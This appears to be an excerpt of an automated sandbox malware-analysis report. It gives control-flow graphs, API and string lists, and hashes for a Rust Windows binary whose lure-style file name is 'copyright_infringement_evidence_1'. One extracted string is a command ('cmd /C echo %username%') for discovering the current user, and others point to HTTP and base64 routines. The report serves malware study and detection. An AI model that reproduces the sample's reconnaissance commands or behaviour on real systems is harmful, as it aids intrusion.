7ff7a17b9b5c-7ff7a17b9b66 994->1008 995->986 997 7ff7a17b9b33-7ff7a17b9b43 call 7ff7a18d2b40 995->997 997->994 1009 7ff7a17b9b45 997->1009 1003 7ff7a17b97d2 999->1003 1004 7ff7a17b97d7-7ff7a17b97df 999->1004 1006 7ff7a17b9803-7ff7a17b9810 1000->1006 1007 7ff7a17b97f9-7ff7a17b97fe call 7ff7a17dc0b0 1000->1007 1003->1004 1004->1000 1010 7ff7a17b97e1-7ff7a17b97e9 call 7ff7a178c650 1004->1010 1013 7ff7a17b9812 1006->1013 1014 7ff7a17b9817-7ff7a17b981e 1006->1014 1007->1006 1008->974 1012 7ff7a17b9b6c-7ff7a17b9c2e call 7ff7a1860270 1008->1012 1009->986 1010->1000 1012->986 1013->1014 1015 7ff7a17b9820-7ff7a17b9827 call 7ff7a178c650 1014->1015 1016 7ff7a17b982c-7ff7a17b9837 1014->1016 1015->1016 1020 7ff7a17b9839-7ff7a17b983d 1016->1020 1021 7ff7a17b9847-7ff7a17b9852 1016->1021 1020->1021 1023 7ff7a17b983f-7ff7a17b9842 call 7ff7a17dc5d0 1020->1023 1024 7ff7a17b9854-7ff7a17b9858 1021->1024 1025 7ff7a17b9867-7ff7a17b9874 1021->1025 1023->1021 1024->1025 1027 7ff7a17b985a-7ff7a17b9862 call 7ff7a17dc2c0 1024->1027 1025->973 1028 7ff7a17b987a-7ff7a17b987e 1025->1028 1027->1025 1028->973 1030 7ff7a17b9884-7ff7a17b9891 call 7ff7a17dc2c0 1028->1030 1030->973
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • ALPN upgraded to HTTP/2C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.30\src\client\client.rs, xrefs: 00007FF7A17B97A5
                                                                                                          • FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.30\src\proto\h1\decode.rs, xrefs: 00007FF7A17B9C42
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: ALPN upgraded to HTTP/2C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.30\src\client\client.rs$FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.30\src\proto\h1\decode.rs
                                                                                                          • API String ID: 2162964266-1185490701
                                                                                                          • Opcode ID: 47c93d219d4fa888b6d52660e697340aa237efe777e37362f65533dc1077890e
                                                                                                          • Instruction ID: c09a7db48843f013b9c3739ddecce15b787a5c7d73c3972c626b66c3429390ab
                                                                                                          • Opcode Fuzzy Hash: 47c93d219d4fa888b6d52660e697340aa237efe777e37362f65533dc1077890e
                                                                                                          • Instruction Fuzzy Hash: 50F16C62A0EBC181F7719B15E0413EAA3A1FBA9784F45A125DFCD026A6DF7CE185CB10

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1200 7ff7a18a9e90-7ff7a18a9ece call 7ff7a18b4520 1203 7ff7a18a9ed0-7ff7a18a9ed5 1200->1203 1204 7ff7a18a9eda-7ff7a18a9f0a call 7ff7a18b5f40 1200->1204 1205 7ff7a18aa07f-7ff7a18aa08e 1203->1205 1208 7ff7a18a9f14-7ff7a18a9f20 1204->1208 1209 7ff7a18a9f0c-7ff7a18a9f0f 1204->1209 1210 7ff7a18a9f22-7ff7a18a9f24 1208->1210 1211 7ff7a18a9f2c-7ff7a18a9f2e 1208->1211 1209->1205 1212 7ff7a18a9f30-7ff7a18a9f38 1210->1212 1213 7ff7a18a9f26-7ff7a18a9f2a 1210->1213 1211->1212 1214 7ff7a18a9f75-7ff7a18a9f79 1211->1214 1217 7ff7a18a9f89-7ff7a18a9f8d 1212->1217 1218 7ff7a18a9f3a-7ff7a18a9f3c 1212->1218 1213->1217 1215 7ff7a18a9f3e-7ff7a18a9f4b 1214->1215 1216 7ff7a18a9f7b-7ff7a18a9f7f 1214->1216 1215->1205 1222 7ff7a18a9f51-7ff7a18a9f70 call 7ff7a178c650 1215->1222 1216->1215 1219 7ff7a18a9f81-7ff7a18a9f85 1216->1219 1220 7ff7a18a9fc2-7ff7a18a9fc4 1217->1220 1221 7ff7a18a9f8f-7ff7a18a9f91 1217->1221 1218->1215 1218->1217 1219->1215 1224 7ff7a18a9f87 1219->1224 1226 7ff7a18a9fca-7ff7a18a9fd3 1220->1226 1227 7ff7a18aa0bf-7ff7a18aa0cf 1220->1227 1225 7ff7a18a9f93-7ff7a18a9f9c 1221->1225 1221->1226 1222->1205 1224->1217 1229 7ff7a18a9fd5 1225->1229 1230 7ff7a18a9f9e-7ff7a18a9fa2 1225->1230 1226->1229 1226->1230 1227->1229 1231 7ff7a18aa0d5 1227->1231 1234 7ff7a18a9fd8-7ff7a18aa019 CreateFileW 1229->1234 1232 7ff7a18a9fa8-7ff7a18a9fc0 1230->1232 1233 7ff7a18aa0ac-7ff7a18aa0af 1230->1233 1235 7ff7a18aa0da-7ff7a18aa0f7 GetLastError CloseHandle 1231->1235 1232->1234 1236 7ff7a18aa0b1-7ff7a18aa0b3 1233->1236 1237 7ff7a18aa11a-7ff7a18aa11c 1233->1237 1238 7ff7a18aa08f-7ff7a18aa0a8 GetLastError 1234->1238 1239 7ff7a18aa01b-7ff7a18aa022 1234->1239 1242 7ff7a18aa0f9-7ff7a18aa108 call 7ff7a178c650 1235->1242 1243 7ff7a18aa10d-7ff7a18aa115 1235->1243 1244 7ff7a18aa122-7ff7a18aa127 1236->1244 1247 7ff7a18aa0b5-7ff7a18aa0ba 1236->1247 1237->1215 1237->1244 1245 7ff7a18aa062-7ff7a18aa079 call 7ff7a178c650 1238->1245 1246 7ff7a18aa0aa 1238->1246 1240 7ff7a18aa024-7ff7a18aa028 1239->1240 1241 7ff7a18aa05b-7ff7a18aa060 1239->1241 1240->1241 1248 7ff7a18aa02a-7ff7a18aa035 GetLastError 1240->1248 1241->1245 1250 7ff7a18aa07c 1241->1250 1242->1243 1243->1205 1244->1234 1245->1250 1246->1250 1247->1234 1248->1241 1252 7ff7a18aa037-7ff7a18aa059 SetFileInformationByHandle 1248->1252 1250->1205 1252->1235 1252->1241
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$FileHandle$CloseCreateInformation
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617036312-0
                                                                                                          • Opcode ID: e395b7d69932875aa34c85ce3bcc51a73b4ed4474b879ae90077aae6b089c710
                                                                                                          • Instruction ID: d8a51d4c86f1bcc85cbd0c6dc4d0ca443887e2e4d45741ba5c820eec8b17709c
                                                                                                          • Opcode Fuzzy Hash: e395b7d69932875aa34c85ce3bcc51a73b4ed4474b879ae90077aae6b089c710
                                                                                                          • Instruction Fuzzy Hash: AF712751F0E61287FB216B31D400379A6A1AF04BE8F9B4171CD4D07BE9DEBDE8658B20

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1254 7ff7a189efa0-7ff7a189efb7 1255 7ff7a189efc1-7ff7a189efda CreateWaitableTimerExW 1254->1255 1256 7ff7a189efb9-7ff7a189efbb 1254->1256 1257 7ff7a189f05a-7ff7a189f06a 1255->1257 1258 7ff7a189efdc-7ff7a189efea 1255->1258 1256->1255 1256->1257 1259 7ff7a189f06c-7ff7a189f07c 1257->1259 1260 7ff7a189f09e Sleep 1257->1260 1261 7ff7a189f051-7ff7a189f054 CloseHandle 1258->1261 1262 7ff7a189efec-7ff7a189effc 1258->1262 1259->1260 1263 7ff7a189f07e-7ff7a189f090 1259->1263 1264 7ff7a189f0a4-7ff7a189f0af 1260->1264 1261->1257 1262->1261 1265 7ff7a189effe 1262->1265 1263->1260 1266 7ff7a189f092-7ff7a189f09a 1263->1266 1265->1261 1267 7ff7a189f000-7ff7a189f02d SetWaitableTimer 1265->1267 1266->1260 1267->1261 1268 7ff7a189f02f-7ff7a189f04d WaitForSingleObject CloseHandle 1267->1268 1268->1264 1269 7ff7a189f04f 1268->1269 1269->1257
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 2261246915-0
                                                                                                          • Opcode ID: 14bbb4432ce8c08727f0f470b40bde5e36134f73d0306aa396576427bd00621a
                                                                                                          • Instruction ID: 52d7b36c717f5c830bbd859266f5fbaf514d1ceb0d12d641d7c2e2a9f6e8013a
                                                                                                          • Opcode Fuzzy Hash: 14bbb4432ce8c08727f0f470b40bde5e36134f73d0306aa396576427bd00621a
                                                                                                          • Instruction Fuzzy Hash: 7521E622B0761242FB1CAB266D14334AA1A5F857B0F998274ED1E477F4DEBDB8514B20

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1270 7ff7a1782bee-7ff7a1782c0b 1271 7ff7a1782c0d-7ff7a1782c1b 1270->1271 1272 7ff7a1782c55-7ff7a1782c80 call 7ff7a189ff30 1270->1272 1274 7ff7a1782c1d 1271->1274 1275 7ff7a1782c22-7ff7a1782c29 1271->1275 1279 7ff7a1782c94-7ff7a1782de3 call 7ff7a18beb60 call 7ff7a1789a00 call 7ff7a18a5890 call 7ff7a18b5440 call 7ff7a18b5680 call 7ff7a18beb60 1272->1279 1280 7ff7a1782c82-7ff7a17831aa call 7ff7a178c640 1272->1280 1274->1275 1277 7ff7a1782c2b-7ff7a1782c32 call 7ff7a178c650 1275->1277 1278 7ff7a1782c37-7ff7a1782c4d call 7ff7a178c650 1275->1278 1277->1278 1278->1272 1326 7ff7a1782dfd-7ff7a1782e1f call 7ff7a1789690 1279->1326 1327 7ff7a1782de5-7ff7a1782de8 1279->1327 1290 7ff7a1783430-7ff7a17834a2 call 7ff7a18d8d40 call 7ff7a18d9120 call 7ff7a18d8f10 call 7ff7a18d93c0 call 7ff7a18d8f10 1280->1290 1291 7ff7a17831b0-7ff7a17831b6 1280->1291 1335 7ff7a17834a7-7ff7a17834de call 7ff7a18d93c0 1290->1335 1293 7ff7a17831bb-7ff7a17831c6 1291->1293 1296 7ff7a17831c8-7ff7a17831d1 call 7ff7a178c650 1293->1296 1297 7ff7a17831d6-7ff7a17831e8 1293->1297 1296->1297 1301 7ff7a17831fd-7ff7a1783215 call 7ff7a1788910 1297->1301 1302 7ff7a17831ea-7ff7a17831f8 call 7ff7a178c650 1297->1302 1314 7ff7a1783217-7ff7a178322d call 7ff7a178c650 1301->1314 1315 7ff7a1783232-7ff7a178323d 1301->1315 1302->1301 1314->1315 1318 7ff7a1783252-7ff7a1783255 1315->1318 1319 7ff7a178323f-7ff7a178324d call 7ff7a178c650 1315->1319 1324 7ff7a1783257-7ff7a178325b 1318->1324 1325 7ff7a1783282-7ff7a178328d 1318->1325 1319->1318 1331 7ff7a1783269-7ff7a1783270 1324->1331 1328 7ff7a17832a5-7ff7a17832b8 1325->1328 1329 7ff7a178328f-7ff7a17832a0 call 7ff7a178c650 1325->1329 1349 7ff7a1782e25-7ff7a1782e43 call 7ff7a17898c0 1326->1349 1350 7ff7a17830cf-7ff7a17830e8 call 7ff7a178c640 1326->1350 1327->1326 1332 7ff7a1782dea-7ff7a1782df8 call 7ff7a178c650 1327->1332 1336 7ff7a17832ba-7ff7a17832be 1328->1336 1337 7ff7a17832e4-7ff7a17832ef 1328->1337 1329->1328 1338 7ff7a1783272-7ff7a1783280 call 7ff7a178c650 1331->1338 1339 7ff7a1783260-7ff7a1783267 1331->1339 1332->1326 1351 7ff7a17834e3-7ff7a17834f5 call 7ff7a18d9120 1335->1351 1343 7ff7a17832c9-7ff7a17832d1 1336->1343 1345 7ff7a1783307-7ff7a1783312 1337->1345 1346 7ff7a17832f1-7ff7a1783302 call 7ff7a178c650 1337->1346 1338->1339 1339->1325 1339->1331 1352 7ff7a17832d3-7ff7a17832e2 call 7ff7a178c650 1343->1352 1353 7ff7a17832c0-7ff7a17832c7 1343->1353 1347 7ff7a1783327-7ff7a1783332 1345->1347 1348 7ff7a1783314-7ff7a1783322 call 7ff7a178c650 1345->1348 1346->1345 1358 7ff7a1783347-7ff7a1783352 1347->1358 1359 7ff7a1783334-7ff7a1783342 call 7ff7a178c650 1347->1359 1348->1347 1372 7ff7a1782e49-7ff7a1782e66 call 7ff7a18a11b0 call 7ff7a18a11e0 1349->1372 1373 7ff7a17830f6-7ff7a1783112 call 7ff7a178c640 1349->1373 1350->1290 1370 7ff7a17830ee-7ff7a17830f4 1350->1370 1368 7ff7a17834fa-7ff7a1783509 1351->1368 1352->1353 1353->1337 1353->1343 1365 7ff7a1781faa-7ff7a1781fad 1358->1365 1366 7ff7a1783358-7ff7a178336b call 7ff7a178c650 1358->1366 1359->1358 1375 7ff7a1781fc0-7ff7a1781fe1 1365->1375 1376 7ff7a1781faf-7ff7a1781fb8 1365->1376 1366->1365 1374 7ff7a178352b-7ff7a1783550 call 7ff7a18d93c0 1368->1374 1377 7ff7a178312c-7ff7a1783134 1370->1377 1401 7ff7a178351c-7ff7a1783524 1372->1401 1402 7ff7a1782e6c-7ff7a1782e8d CloseHandle 1372->1402 1373->1290 1388 7ff7a1783118-7ff7a1783126 CloseHandle 1373->1388 1393 7ff7a178355c-7ff7a1783569 call 7ff7a18d8d20 1374->1393 1394 7ff7a1783557 call 7ff7a18d8f10 1374->1394 1376->1375 1382 7ff7a1781fbb call 7ff7a178c650 1376->1382 1384 7ff7a1783147-7ff7a1783152 1377->1384 1385 7ff7a1783136-7ff7a1783142 call 7ff7a178c650 1377->1385 1382->1375 1390 7ff7a1783167-7ff7a1783177 1384->1390 1391 7ff7a1783154-7ff7a1783162 call 7ff7a178c650 1384->1391 1385->1384 1388->1377 1390->1293 1398 7ff7a1783179-7ff7a178318c call 7ff7a178c650 1390->1398 1391->1390 1400 7ff7a178356e-7ff7a1783579 call 7ff7a18d8d20 1393->1400 1394->1393 1398->1293 1410 7ff7a178357e-7ff7a178359b call 7ff7a18d8d40 1400->1410 1401->1374 1403 7ff7a1782ea0-7ff7a1782eab 1402->1403 1404 7ff7a1782e8f-7ff7a1782e9b call 7ff7a178c650 1402->1404 1408 7ff7a1782ead-7ff7a1782ebb call 7ff7a178c650 1403->1408 1409 7ff7a1782ec0-7ff7a1782ed5 1403->1409 1404->1403 1408->1409 1412 7ff7a1782eea-7ff7a1782ef5 1409->1412 1413 7ff7a1782ed7-7ff7a1782ee5 call 7ff7a178c650 1409->1413 1423 7ff7a178359d-7ff7a17835a8 1410->1423 1424 7ff7a1783606-7ff7a1783610 1410->1424 1417 7ff7a1782f07-7ff7a1782f12 1412->1417 1418 7ff7a1782ef7-7ff7a1782f02 call 7ff7a178c650 1412->1418 1413->1412 1421 7ff7a1782f18-7ff7a1782f2b call 7ff7a178c650 1417->1421 1422 7ff7a1782957-7ff7a178296e 1417->1422 1418->1417 1421->1350 1425 7ff7a1782974-7ff7a178297c 1422->1425 1426 7ff7a1782f30-7ff7a1782f73 1422->1426 1433 7ff7a17835ab 1423->1433 1425->1351 1430 7ff7a1782982-7ff7a17829bc call 7ff7a18a11b0 call 7ff7a18a11e0 1425->1430 1428 7ff7a1782f75-7ff7a1782f81 1426->1428 1429 7ff7a1782fd1-7ff7a1782fe9 call 7ff7a1788d10 1426->1429 1434 7ff7a1782f89-7ff7a1782f90 1428->1434 1440 7ff7a1782ffe-7ff7a178300e call 7ff7a17814b0 1429->1440 1441 7ff7a1782feb-7ff7a1782ff9 call 7ff7a178c650 1429->1441 1430->1368 1448 7ff7a17829c2-7ff7a1782a29 call 7ff7a18ad410 call 7ff7a1789a50 call 7ff7a18ad6f0 call 7ff7a18a5a90 1430->1448 1433->1433 1437 7ff7a1782fc9 1434->1437 1438 7ff7a1782f92-7ff7a1782fb3 call 7ff7a178bbd0 1434->1438 1437->1429 1438->1335 1450 7ff7a1782fb9-7ff7a1782fc4 1438->1450 1452 7ff7a1783021-7ff7a1783023 1440->1452 1453 7ff7a1783010-7ff7a178301c call 7ff7a178c650 1440->1453 1441->1440 1463 7ff7a1783028-7ff7a1783041 call 7ff7a178c640 1448->1463 1464 7ff7a1782a2f-7ff7a1782a73 call 7ff7a1781110 call 7ff7a18c81e0 1448->1464 1450->1434 1454 7ff7a1782fc6 1450->1454 1452->1375 1453->1452 1454->1437 1463->1290 1469 7ff7a1783047-7ff7a1783066 call 7ff7a1781110 1463->1469 1474 7ff7a178306b-7ff7a178308c call 7ff7a178c640 1464->1474 1475 7ff7a1782a79-7ff7a1782a8d call 7ff7a1788150 1464->1475 1469->1301 1474->1410 1480 7ff7a1783092-7ff7a17830b3 1474->1480 1481 7ff7a1782ab9 1475->1481 1482 7ff7a1782a8f 1475->1482 1483 7ff7a17830c5-7ff7a17830ca 1480->1483 1484 7ff7a17830b5-7ff7a17830c0 call 7ff7a178c650 1480->1484 1486 7ff7a1782abe-7ff7a1782b0c memmove call 7ff7a18a11b0 call 7ff7a18a11e0 1481->1486 1482->1400 1485 7ff7a1782a95-7ff7a1782ab2 call 7ff7a178c640 1482->1485 1483->1301 1484->1483 1485->1486 1492 7ff7a1782ab4 1485->1492 1496 7ff7a178350b-7ff7a178351a 1486->1496 1497 7ff7a1782b12-7ff7a1782bd8 call 7ff7a18beb60 1486->1497 1492->1393 1496->1374 1497->1426 1501 7ff7a1782bdb call 7ff7a18aa440 1497->1501 1501->1426
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: called `Result::unwrap()` on an `Err` value$cmd/Cecho%username%$failed to spawn thread/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\std\src\thread\mod.rs
                                                                                                          • API String ID: 0-1417789016
                                                                                                          • Opcode ID: 9dfec8a807a1107c3cbdf5ab504d20610a4b4f806b4b45f72f505dc83b60e481
                                                                                                          • Instruction ID: a5e686cbc512aea5b889bbab8d3cf7d9a7ea42cb377dea55fb3350e891feaa96
                                                                                                          • Opcode Fuzzy Hash: 9dfec8a807a1107c3cbdf5ab504d20610a4b4f806b4b45f72f505dc83b60e481
                                                                                                          • Instruction Fuzzy Hash: 2702456170EBC180FB70AB05E4403EAE360FB88795F955035DA8D47BAADFACE544CB60

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1502 7ff7a179f4b5-7ff7a179f4c1 1503 7ff7a179f4c7-7ff7a179f4d4 1502->1503 1504 7ff7a179f5db-7ff7a179f5ea call 7ff7a18d94c0 1502->1504 1505 7ff7a179f5b6-7ff7a179f5c5 call 7ff7a18cd720 1503->1505 1506 7ff7a179f4da-7ff7a179f512 memmove 1503->1506 1510 7ff7a179f5ef-7ff7a179f601 call 7ff7a18d94c0 1504->1510 1505->1506 1506->1510 1512 7ff7a179f518-7ff7a179f53a call 7ff7a17fd360 1506->1512 1514 7ff7a179f606-7ff7a179f62a call 7ff7a18d93c0 1510->1514 1512->1514 1519 7ff7a179f540-7ff7a179f54d 1512->1519 1518 7ff7a179f62f-7ff7a179f675 call 7ff7a18d8f30 1514->1518 1526 7ff7a179f680-7ff7a179f754 call 7ff7a186ff20 1518->1526 1520 7ff7a179f54f-7ff7a179f560 1519->1520 1521 7ff7a179f5a6 1519->1521 1520->1518 1523 7ff7a179f566-7ff7a179f56d 1520->1523 1521->1505 1523->1504 1525 7ff7a179f56f-7ff7a179f57c 1523->1525 1527 7ff7a179f5ca-7ff7a179f5d9 call 7ff7a18cd720 1525->1527 1528 7ff7a179f57e-7ff7a179f59b memmove 1525->1528 1536 7ff7a179f796 1526->1536 1537 7ff7a179f756-7ff7a179f759 1526->1537 1527->1528 1528->1521 1538 7ff7a179f79b-7ff7a179f7b0 1536->1538 1537->1538 1539 7ff7a179f75b-7ff7a179f776 1537->1539 1540 7ff7a179f7b1-7ff7a179f802 call 7ff7a18d8f90 1539->1540 1541 7ff7a179f778-7ff7a179f786 1539->1541 1545 7ff7a179f804-7ff7a179f809 1540->1545 1546 7ff7a179f818-7ff7a179f81d 1540->1546 1541->1526 1543 7ff7a179f78c-7ff7a179f78f 1541->1543 1543->1538 1547 7ff7a179f81f-7ff7a179f833 1545->1547 1548 7ff7a179f80b-7ff7a179f816 call 7ff7a17ba340 1545->1548 1546->1547 1549 7ff7a179f85a-7ff7a179f865 call 7ff7a17ba210 1546->1549 1551 7ff7a179f835-7ff7a179f84b memmove 1547->1551 1552 7ff7a179f867-7ff7a179f87a call 7ff7a18d8f30 1547->1552 1556 7ff7a179f84f-7ff7a179f859 1548->1556 1549->1556 1551->1556 1558 7ff7a179f87f-7ff7a179f8a5 1552->1558 1559 7ff7a179f8d8-7ff7a179f90f call 7ff7a18d8f90 1558->1559 1560 7ff7a179f8a7 call 7ff7a179d7d7 1558->1560 1562 7ff7a179f8a9-7ff7a179f8b6 1560->1562 1564 7ff7a179f8b8-7ff7a179f8bc 1562->1564 1565 7ff7a179f8c9-7ff7a179f8d7 1562->1565 1564->1565 1566 7ff7a179f8be-7ff7a179f8c6 call 7ff7a17dbec0 1564->1566 1566->1565
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • Writer must be presentC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\base64-0.21.7\src\write\encoder.rs, xrefs: 00007FF7A179F62F
                                                                                                          • buffer is large enough, xrefs: 00007FF7A179F612
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: Writer must be presentC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\base64-0.21.7\src\write\encoder.rs$buffer is large enough
                                                                                                          • API String ID: 2162964266-891553055
                                                                                                          • Opcode ID: 24e6cea929a41903d247edf797a27a132559ca8a539db54f4adf1754b2ebeb70
                                                                                                          • Instruction ID: ed6ae004516749a993d2c58d499f9fd3c3fb389f680c9b88c258a3ea4c8924c3
                                                                                                          • Opcode Fuzzy Hash: 24e6cea929a41903d247edf797a27a132559ca8a539db54f4adf1754b2ebeb70
                                                                                                          • Instruction Fuzzy Hash: 8DA1F762A0AB4181FB54AF21E8403B9A761FB48BD4F959031EF4D0B7A5DFBCE195C720

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$DescriptionExceptionGuaranteeHandlerStackVectored
                                                                                                          • String ID: main
                                                                                                          • API String ID: 4040331657-3207122276
                                                                                                          • Opcode ID: 9cf549767527a62a0d1d14d4a46e40834f440f6dd2c9ebccb281bda310acaebf
                                                                                                          • Instruction ID: 51f669bd9689776af558d99ac8ac80f996aa010d95e1fa6f01d9c1eac4b1eb42
                                                                                                          • Opcode Fuzzy Hash: 9cf549767527a62a0d1d14d4a46e40834f440f6dd2c9ebccb281bda310acaebf
                                                                                                          • Instruction Fuzzy Hash: 70118C21B06B5588F710EB60E8483EC7361AB45768FC10270D95D57AB8DFBCA848CB50

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
